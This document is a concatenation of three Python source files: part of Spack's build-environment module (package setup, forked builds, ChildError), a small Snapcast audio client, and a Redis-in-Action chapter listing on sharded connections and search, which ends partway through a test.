"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return rpaths
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
spack_env = EnvironmentModifications()
run_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, spack_env)
set_build_environment_variables(pkg, spack_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, spack_env)
# traverse in postorder so package can use vars from its dependencies
spec = pkg.spec
for dspec in pkg.spec.traverse(order='post', root=False,
deptype=('build', 'test')):
spkg = dspec.package
set_module_variables_for_package(spkg)
# Allow dependencies to modify the module
dpkg = dspec.package
dpkg.setup_dependent_package(pkg.module, spec)
dpkg.setup_dependent_environment(spack_env, run_env, spec)
set_module_variables_for_package(pkg)
pkg.setup_environment(spack_env, run_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the spack_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
# Make sure nothing's strange about the Spack environment.
validate(spack_env, tty.warn)
spack_env.apply_modifications()
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopIteration as e:
# StopIteration is used to stop installations
# before the final stage, mainly for debug purposes
tty.msg(e)
child_pipe.send(None)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
if isinstance(child_result, ChildError):
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
Any subclass of InstallError will be annotated by Spack wtih a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
# The error happened in in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
|
__init__.py
|
""" Snapcast Client. """
import logging
import queue
import socket
import threading
import time
from snapcast.client.messages import (hello_packet, request_packet,
command_packet, packet,
basemessage, BASE_SIZE)
from snapcast.client.gstreamer import GstreamerAppSrc
__version__ = '0.0.1-py'
SERVER_PORT = 1704
SYNC_AFTER = 1
BUFFER_SIZE = 30
CMD_START_STREAM = 'startStream'
MSG_SERVER_SETTINGS = 'ServerSettings'
MSG_SAMPLE_FORMAT = 'SampleFormat'
MSG_WIRE_CHUNK = 'WireChunk'
MSG_HEADER = 'Header'
MSG_TIME = 'Time'
_LOGGER = logging.getLogger(__name__)
def mac():
""" Get MAC. """
from uuid import getnode as get_mac
return ':'.join(("%012x" % get_mac())[i:i+2] for i in range(0, 12, 2))
class Client:
""" Snapcast Client. """
def __init__(self, host, port):
""" Setup. """
self._queue = queue.Queue()
self._buffer = queue.Queue()
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect((host, port))
self._source = GstreamerAppSrc()
self._last_sync = time.time()
self._connected = False
self._buffered = False
threading.Thread(target=self._read_socket, daemon=True).start()
threading.Thread(target=self._write_socket, daemon=True).start()
threading.Thread(target=self._play, daemon=True).start()
_LOGGER.info('Connected to %s:%s', host, port)
def register(self):
""" Transact with server. """
self._queue.put(hello_packet(socket.gethostname(), mac(), __version__))
self._queue.put(request_packet(MSG_SERVER_SETTINGS))
self._queue.put(request_packet(MSG_SAMPLE_FORMAT))
self._queue.put(request_packet(MSG_HEADER))
def request_start(self):
""" Indicate readiness to receive stream.
This is a blocking call.
"""
self._queue.put(command_packet(CMD_START_STREAM))
_LOGGER.info('Requesting stream')
self._source.run()
def _read_socket(self):
""" Process incoming messages from socket. """
while True:
base_bytes = self._socket.recv(BASE_SIZE)
base = basemessage.parse(base_bytes)
payload_bytes = self._socket.recv(base.payload_length)
self._handle_message(packet.parse(base_bytes + payload_bytes))
def _handle_message(self, data):
""" Handle messages. """
if data.type == MSG_SERVER_SETTINGS:
_LOGGER.info(data.payload)
elif data.type == MSG_SAMPLE_FORMAT:
_LOGGER.info(data.payload)
self._connected = True
elif data.type == MSG_TIME:
if not self._buffered:
_LOGGER.info('Buffering')
elif data.type == MSG_HEADER:
# Push to app source and start playing.
_LOGGER.info(data.payload.codec.decode('ascii'))
self._source.push(data.payload.header)
self._source.play()
elif data.type == MSG_WIRE_CHUNK:
# Add chunks to play queue.
self._buffer.put(data.payload.chunk)
if self._buffer.qsize() > BUFFER_SIZE:
self._buffered = True
if self._buffer.empty():
self._buffered = False
def _write_socket(self):
""" Pass messages from queue to socket. """
while True:
now = time.time()
if self._connected and (self._last_sync + SYNC_AFTER) < now:
self._queue.put(request_packet(MSG_TIME))
self._last_sync = now
if not self._queue.empty():
self._socket.send(self._queue.get())
def _play(self):
""" Relay buffer to app source. """
while True:
if self._buffered:
self._source.push(self._buffer.get())
|
ch10_listing_source.py
|
import binascii
from collections import defaultdict
from datetime import date
from decimal import Decimal
import functools
import json
from queue import Empty, Queue
import threading
import time
import unittest
import uuid
import redis
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s'%(type, component)
t = CHECKED.get(key)
if (not t) or t < time.time() - wait: #A
CHECKED[key] = time.time() #B
config = json.loads(conn.get(key) or '{}') #C
config = dict((str(k), config[k]) for k in config)
old_config = CONFIGS.get(key) #D
if config != old_config: #E
CONFIGS[key] = config #F
return CONFIGS.get(key)
REDIS_CONNECTIONS = {}
config_connection = None
def redis_connection(component, wait=1): #A
key = 'config:redis:' + component #B
def wrapper(function): #C
@functools.wraps(function) #D
def call(*args, **kwargs): #E
old_config = CONFIGS.get(key, object()) #F
_config = get_config( #G
config_connection, 'redis', component, wait) #G
config = _config
if config != old_config: #H
REDIS_CONNECTIONS[key] = redis.Redis(**config) #H
return function( #I
REDIS_CONNECTIONS.get(key), *args, **kwargs) #I
return call #J
return wrapper #K
def index_document(conn, docid, words, scores):
pipeline = conn.pipeline(True)
for word in words: #I
pipeline.sadd('idx:' + word, docid) #I
pipeline.hmset('kb:doc:%s'%docid, scores)
return len(pipeline.execute()) #J
def parse_and_search(conn, query, ttl):
id = str(uuid.uuid4())
conn.sinterstore('idx:' + id,
['idx:'+key for key in query])
conn.expire('idx:' + id, ttl)
return id
def search_and_sort(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
desc = sort.startswith('-') #B
sort = sort.lstrip('-') #B
by = "kb:doc:*->" + sort #B
alpha = sort not in ('updated', 'id', 'created') #I
if id and not conn.expire(id, ttl): #C
id = None #C
if not id: #D
id = parse_and_search(conn, query, ttl=ttl) #D
pipeline = conn.pipeline(True)
pipeline.scard('idx:' + id) #E
pipeline.sort('idx:' + id, by=by, alpha=alpha, #F
desc=desc, start=start, num=num) #F
results = pipeline.execute()
return results[0], results[1], id #G
def zintersect(conn, keys, ttl):
id = str(uuid.uuid4())
conn.zinterstore('idx:' + id,
dict(('idx:'+k, v) for k,v in keys.items()))
conn.expire('idx:' + id, ttl)
return id
def search_and_zsort(conn, query, id=None, ttl=300, update=1, vote=0, #A
start=0, num=20, desc=True): #A
if id and not conn.expire(id, ttl): #B
id = None #B
if not id: #C
id = parse_and_search(conn, query, ttl=ttl) #C
scored_search = { #D
id: 0, #D
'sort:update': update, #D
'sort:votes': vote #D
}
id = zintersect(conn, scored_search, ttl) #E
pipeline = conn.pipeline(True)
pipeline.zcard('idx:' + id) #F
if desc: #G
pipeline.zrevrange('idx:' + id, start, start + num - 1) #G
else: #G
pipeline.zrange('idx:' + id, start, start + num - 1) #G
results = pipeline.execute()
return results[0], results[1], id #H
def execute_later(conn, queue, name, args):
t = threading.Thread(target=globals()[name], args=tuple(args))
t.setDaemon(1)
t.start()
HOME_TIMELINE_SIZE = 1000
POSTS_PER_PASS = 1000
def shard_key(base, key, total_elements, shard_size): #A
if isinstance(key, int) or key.isdigit(): #B
shard_id = int(str(key), 10) // shard_size #C
else:
if isinstance(key, str):
key = key.encode('latin-1')
shards = 2 * total_elements // shard_size #D
shard_id = binascii.crc32(key) % shards #E
return "%s:%s"%(base, shard_id) #F
def shard_sadd(conn, base, member, total_elements, shard_size):
shard = shard_key(base,
'x'+str(member), total_elements, shard_size) #A
return conn.sadd(shard, member) #B
SHARD_SIZE = 512
EXPECTED = defaultdict(lambda: 1000000)
# <start id="get-connection"/>
def get_redis_connection(component, wait=1):
key = 'config:redis:' + component
old_config = CONFIGS.get(key, object()) #A
config = get_config( #B
config_connection, 'redis', component, wait) #B
if config != old_config: #C
REDIS_CONNECTIONS[key] = redis.Redis(**config) #C
return REDIS_CONNECTIONS.get(key) #D
# <end id="get-connection"/>
#A Fetch the old configuration, if any
#B Get the new configuration, if any
#C If the new and old configuration do not match, create a new connection
#D Return the desired connection object
#END
# <start id="get-sharded-connection"/>
def get_sharded_connection(component, key, shard_count, wait=1):
shard = shard_key(component, 'x'+str(key), shard_count, 2) #A
return get_redis_connection(shard, wait) #B
# <end id="get-sharded-connection"/>
#A Calculate the shard id of the form: <component>:<shard>
#B Return the connection
#END
# <start id="no-decorator-example"/>
def log_recent(conn, app, message):
'the old log_recent() code'
log_recent = redis_connection('logs')(log_recent) #A
# <end id="no-decorator-example"/>
#A This performs the equivalent decoration, but requires repeating the 'log_recent' function name 3 times
#END
# <start id="shard-aware-decorator"/>
def sharded_connection(component, shard_count, wait=1): #A
def wrapper(function): #B
@functools.wraps(function) #C
def call(key, *args, **kwargs): #D
conn = get_sharded_connection( #E
component, key, shard_count, wait) #E
return function(conn, key, *args, **kwargs) #F
return call #G
return wrapper #H
# <end id="shard-aware-decorator"/>
#A Our decorator is going to take a component name, as well as the number of shards desired
#B We are then going to create a wrapper that will actually decorate the function
#C Copy some useful metadata from the original function to the configuration handler
#D Create the function that will calculate a shard id for keys, and set up the connection manager
#E Fetch the sharded connection
#F Actually call the function, passing the connection and existing arguments
#G Return the fully wrapped function
#H Return a function that can wrap functions that need a sharded connection
#END
# <start id="sharded-count-unique"/>
@sharded_connection('unique', 16) #A
def count_visit(conn, session_id):
today = date.today()
key = 'unique:%s'%today.isoformat()
conn2, expected = get_expected(key, today) #B
id = int(session_id.replace('-', '')[:15], 16)
if shard_sadd(conn, key, id, expected, SHARD_SIZE):
conn2.incr(key) #C
@redis_connection('unique') #D
def get_expected(conn, key, today):
'all of the same function body as before, except the last line'
return conn, EXPECTED[key] #E
# <end id="sharded-count-unique"/>
#A We are going to shard this to 16 different machines, which will automatically shard to multiple keys on each machine
#B Our changed call to get_expected()
#C Use the returned non-sharded connection to increment our unique counts
#D Use a non-sharded connection to get_expected()
#E Also return the non-sharded connection so that count_visit() can increment our unique count as necessary
#END
# <start id="search-with-values"/>
def search_get_values(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
count, docids, id = search_and_sort( #B
conn, query, id, ttl, sort, 0, start+num) #B
key = "kb:doc:%s"
sort = sort.lstrip('-')
pipe = conn.pipeline(False)
for docid in docids: #C
if isinstance(docid, bytes):
docid = docid.decode('latin-1')
pipe.hget(key%docid, sort) #C
sort_column = pipe.execute() #C
data_pairs = list(zip(docids, sort_column)) #D
return count, data_pairs, id #E
# <end id="search-with-values"/>
#A We need to take all of the same parameters to pass on to search_and_sort()
#B First get the results of a search and sort
#C Fetch the data that the results were sorted by
#D Pair up the document ids with the data that it was sorted by
#E Return the count, data, and cache id of the results
#END
# <start id="search-on-shards"/>
def get_shard_results(component, shards, query, ids=None, ttl=300, #A
sort="-updated", start=0, num=20, wait=1): #A
count = 0 #B
data = [] #B
ids = ids or shards * [None] #C
for shard in range(shards):
conn = get_redis_connection('%s:%s'%(component, shard), wait)#D
c, d, i = search_get_values( #E
conn, query, ids[shard], ttl, sort, start, num) #E
count += c #F
data.extend(d) #F
ids[shard] = i #F
return count, data, ids #G
# <end id="search-on-shards"/>
#A In order to know what servers to connect to, we are going to assume that all of our shard information is kept in the standard configuration location
#B Prepare structures to hold all of our fetched data
#C Use cached results if we have any, otherwise start over
#D Get or create a connection to the desired shard
#E Fetch the search results and their sort values
#F Combine this shard's results with all of the other results
#G Return the raw results from all of the shards
#END
def get_values_thread(component, shard, wait, rqueue, *args, **kwargs):
conn = get_redis_connection('%s:%s'%(component, shard), wait)
count, results, id = search_get_values(conn, *args, **kwargs)
rqueue.put((shard, count, results, id))
def get_shard_results_thread(component, shards, query, ids=None, ttl=300,
sort="-updated", start=0, num=20, wait=1, timeout=.5):
ids = ids or shards * [None]
rqueue = Queue()
for shard in range(shards):
t = threading.Thread(target=get_values_thread, args=(
component, shard, wait, rqueue, query, ids[shard],
ttl, sort, start, num))
t.setDaemon(1)
t.start()
received = 0
count = 0
data = []
deadline = time.time() + timeout
while received < shards and time.time() < deadline:
try:
sh, c, r, i = rqueue.get(timeout=max(deadline-time.time(), .001))
except Empty:
break
else:
count += c
data.extend(r)
ids[sh] = i
return count, data, ids
# <start id="merge-sharded-results"/>
def to_numeric_key(data):
try:
return Decimal(data[1] or '0') #A
except:
return Decimal('0') #A
def to_string_key(data):
return data[1] or '' #B
def search_shards(component, shards, query, ids=None, ttl=300, #C
sort="-updated", start=0, num=20, wait=1): #C
count, data, ids = get_shard_results( #D
component, shards, query, ids, ttl, sort, start, num, wait) #D
reversed = sort.startswith('-') #E
sort = sort.strip('-') #E
key = to_numeric_key #E
if sort not in ('updated', 'id', 'created'): #E
key = to_string_key #E
data.sort(key=key, reverse=reversed) #F
results = []
for docid, score in data[start:start+num]: #G
results.append(docid) #G
return count, results, ids #H
# <end id="merge-sharded-results"/>
#A We are going to use the 'Decimal' numeric type here because it transparently handles both integers and floats reasonably, defaulting to 0 if the value wasn't numeric or was missing
#B Always return a string, even if there was no value stored
#C We need to take all of the sharding and searching arguments, mostly to pass on to lower-level functions, but we use the sort and search offsets
#D Fetch the results of the unsorted sharded search
#E Prepare all of our sorting options
#F Actually sort our results based on the sort parameter
#G Fetch just the page of results that we want
#H Return the results, including the sequence of cache ids for each shard
#END
# <start id="zset-search-with-values"/>
def search_get_zset_values(conn, query, id=None, ttl=300, update=1, #A
vote=0, start=0, num=20, desc=True): #A
count, r, id = search_and_zsort( #B
conn, query, id, ttl, update, vote, 0, 1, desc) #B
if desc: #C
data = conn.zrevrange(id, 0, start + num - 1, withscores=True)#C
else: #C
data = conn.zrange(id, 0, start + num - 1, withscores=True) #C
return count, data, id #D
# <end id="zset-search-with-values"/>
#A We need to accept all of the standard arguments for search_and_zsort()
#B Call the underlying search_and_zsort() function to get the cached result id and total number of results
#C Fetch all of the results we need, including their scores
#D Return the count, results with scores, and the cache id
#END
# <start id="search-shards-zset"/>
def search_shards_zset(component, shards, query, ids=None, ttl=300, #A
update=1, vote=0, start=0, num=20, desc=True, wait=1):#A
count = 0 #B
data = [] #B
ids = ids or shards * [None] #C
for shard in range(shards):
conn = get_redis_connection('%s:%s'%(component, shard), wait) #D
c, d, i = search_get_zset_values(conn, query, ids[shard], #E
ttl, update, vote, start, num, desc) #E
count += c #F
data.extend(d) #F
ids[shard] = i #F
def key(result): #G
return result[1] #G
data.sort(key=key, reversed=desc) #H
results = []
for docid, score in data[start:start+num]: #I
results.append(docid) #I
return count, results, ids #J
# <end id="search-shards-zset"/>
#A We need to take all of the sharding arguments along with all of the search arguments
#B Prepare structures for data to be returned
#C Use cached results if any, otherwise start from scratch
#D Fetch or create a connection to each shard
#E Perform the search on a shard and fetch the scores
#F Merge the results together
#G Prepare the simple sort helper to only return information about the score
#H Sort all of the results together
#I Extract the document ids from the results, removing the scores
#J Return the search results to the caller
#END
# <start id="sharded-api-base"/>
class KeyShardedConnection(object):
def __init__(self, component, shards): #A
self.component = component #A
self.shards = shards #A
def __getitem__(self, key): #B
return get_sharded_connection( #C
self.component, key, self.shards) #C
# <end id="sharded-api-base"/>
#A The object is initialized with the component name and number of shards
#B When an item is fetched from the object, this method is called with the item that was requested
#C Use the passed key along with the previously-known component and shards to fetch the sharded connection
#END
# <start id="sharded-api-example"/>
sharded_timelines = KeyShardedConnection('timelines', 8) #A
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
if conn.zscore(fkey1, other_uid):
print("already followed", uid, other_uid)
return None
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, {other_uid: now})
pipeline.zadd(fkey2, {uid: now})
pipeline.zcard(fkey1)
pipeline.zcard(fkey2)
following, followers = pipeline.execute()[-2:]
pipeline.hset('user:%s'%uid, 'following', following)
pipeline.hset('user:%s'%other_uid, 'followers', followers)
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange( #B
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True) #B
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True) #C
pipe.zadd(hkey, dict(status_and_score)) #D
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)#D
pipe.execute() #E
return True
# <end id="sharded-api-example"/>
#A Create a connection that knows about the sharding information for a given component with a number of shards
#B Fetch the recent status messages from the profile timeline of the now-followed user
#C Get a connection based on the shard key provided, and fetch a pipeline from that
#D Add the statuses to the home timeline ZSET on the shard, then trim it
#E Execute the transaction
#END
# <start id="key-data-sharded-api"/>
class KeyDataShardedConnection(object):
def __init__(self, component, shards): #A
self.component = component #A
self.shards = shards #A
def __getitem__(self, ids): #B
id1, id2 = list(map(int, ids)) #C
if id2 < id1: #D
id1, id2 = id2, id1 #D
key = "%s:%s"%(id1, id2) #E
return get_sharded_connection( #F
self.component, key, self.shards) #F
# <end id="key-data-sharded-api"/>
#A The object is initialized with the component name and number of shards
#B When the pair of ids are passed as part of the dictionary lookup, this method is called
#C Unpack the pair of ids, and ensure that they are integers
#D If the second is less than the first, swap them so that the first id is less than or equal to the second
#E Construct a key based on the two ids
#F Use the computed key along with the previously-known component and shards to fetch the sharded connection
#END
_follow_user = follow_user
# <start id="sharded-api-example2"/>
sharded_timelines = KeyShardedConnection('timelines', 8) #A
sharded_followers = KeyDataShardedConnection('followers', 16) #A
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
sconn = sharded_followers[uid, other_uid] #B
if sconn.zscore(fkey1, other_uid): #C
return None
now = time.time()
spipe = sconn.pipeline(True)
spipe.zadd(fkey1, {other_uid: now}) #D
spipe.zadd(fkey2, {uid: now}) #D
following, followers = spipe.execute()
pipeline = conn.pipeline(True)
pipeline.hincrby('user:%s'%uid, 'following', int(following)) #E
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers))#E
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange(
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True)
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True)
pipe.zadd(hkey, dict(status_and_score))
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)
pipe.execute()
return True
# <end id="sharded-api-example2"/>
#A Create a connection that knows about the sharding information for a given component with a number of shards
#B Fetch the connection object for the uid,other_uid pair
#C Check to see if other_uid is already followed
#D Add the follower/following information to the ZSETs
#E Update the follower and following information for both users
#END
# <start id="sharded-zrangebyscore"/>
def sharded_zrangebyscore(component, shards, key, min, max, num): #A
data = []
for shard in range(shards):
conn = get_redis_connection("%s:%s"%(component, shard)) #B
data.extend(conn.zrangebyscore( #C
key, min, max, start=0, num=num, withscores=True)) #C
def key(pair): #D
return pair[1], pair[0] #D
data.sort(key=key) #D
return data[:num] #E
# <end id="sharded-zrangebyscore"/>
#A We need to take arguments for the component and number of shards, and we are going to limit the arguments to be passed on to only those that will ensure correct behavior in sharded situations
#B Fetch the sharded connection for the current shard
#C Get the data from Redis for this shard
#D Sort the data based on score then by member
#E Return only the number of items requested
#END
# <start id="sharded-syndicate-posts"/>
def syndicate_status(uid, post, start=0, on_lists=False):
root = 'followers'
key = 'followers:%s'%uid
base = 'home:%s'
if on_lists:
root = 'list:out'
key = 'list:out:%s'%uid
base = 'list:statuses:%s'
followers = sharded_zrangebyscore(root, #A
sharded_followers.shards, key, start, 'inf', POSTS_PER_PASS)#A
to_send = defaultdict(list) #B
for follower, start in followers:
timeline = base % follower #C
shard = shard_key('timelines', #D
timeline, sharded_timelines.shards, 2) #D
to_send[shard].append(timeline) #E
for timelines in to_send.values():
pipe = sharded_timelines[timelines[0]].pipeline(False) #F
for timeline in timelines:
pipe.zadd(timeline, post) #G
pipe.zremrangebyrank( #G
timeline, 0, -HOME_TIMELINE_SIZE-1) #G
pipe.execute()
conn = redis.Redis()
if len(followers) >= POSTS_PER_PASS:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, start, on_lists])
elif not on_lists:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, 0, True])
# <end id="sharded-syndicate-posts"/>
#A Fetch the next group of followers using the sharded ZRANGEBYSCORE call
#B Prepare a structure that will group profile information on a per-shard basis
#C Calculate the key for the timeline
#D Find the shard where this timeline would go
#E Add the timeline key to the rest of the timelines on the same shard
#F Get a connection to the server for the group of timelines, and create a pipeline
#G Add the post to the timeline, and remove any posts that are too old
#END
def _fake_shards_for(conn, component, count, actual):
assert actual <= 4
for i in range(count):
m = i % actual
conn.set('config:redis:%s:%i'%(component, i), json.dumps({'db':14 - m}))
class TestCh10(unittest.TestCase):
def _flush(self):
self.conn.flushdb()
redis.Redis(db=14).flushdb()
redis.Redis(db=13).flushdb()
redis.Redis(db=12).flushdb()
redis.Redis(db=11).flushdb()
def setUp(self):
self.conn = redis.Redis(db=15)
self._flush()
global config_connection
config_connection = self.conn
self.conn.set('config:redis:test', json.dumps({'db':15}))
def tearDown(self):
self._flush()
def test_get_sharded_connections(self):
_fake_shards_for(self.conn, 'shard', 2, 2)
